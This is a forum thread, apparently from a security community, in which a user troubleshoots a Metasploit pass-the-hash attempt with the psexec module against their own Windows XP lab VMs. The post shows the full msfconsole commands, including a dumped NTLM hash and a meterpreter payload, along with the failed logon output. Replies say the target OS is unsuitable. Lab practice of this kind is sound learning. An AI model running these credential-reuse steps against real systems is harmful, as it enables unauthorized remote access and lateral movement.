The windows XP does not support multiple logins. Try using against windows 2000/2003/2008.
See:
http://www.offensive-security.com/me..._Pass_The_Hash
Regards,
Finally got past my issues with getting a session to XP VM on Virtualbox. Layer 8 issue..
Now that I am finally in, here is my XP VM systems both have administratorassword
I ran run hashdump on both after getting session with MS08_068_netapi
Both hash for admin 500 are a match. Both VM are XP in Workgroup
Now I ran
msf exploit(psexec) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd3 0aa94ddeb3cf52d
SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd3 0aa94ddeb3cf52d
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit
This was the result
msf exploit(psexec) > exploit
[-] Exploit failed: The following options failed to validate: LHOST.[*] Exploit completed, but no session was created.
msf exploit(psexec) > set lhost 10.40.8.11
lhost => 10.40.8.11
msf exploit(psexec) > exploit
[*] Started reverse handler on y.y.y.y:4444 [*] Connecting to the server...[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...
[-] Exploit exception: Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)[*] Exploit completed, but no session was created.
msf exploit(psexec) >
Am I missing something here ?
Cheers
The windows XP does not support multiple logins. Try using against windows 2000/2003/2008.
See:
http://www.offensive-security.com/me..._Pass_The_Hash
Regards,
(gdb) disass m(y_br)ain
®
Hi, thanks. I think that is where I started. Sysinternals states it does work with XP so I didn't think that was an issue . I know this isn't quite the same as the tool set, but...
http://technet.microsoft.com/en-us/s...rnals/bb897553
I will try on my server 03 vm and see what happens.
Cheers.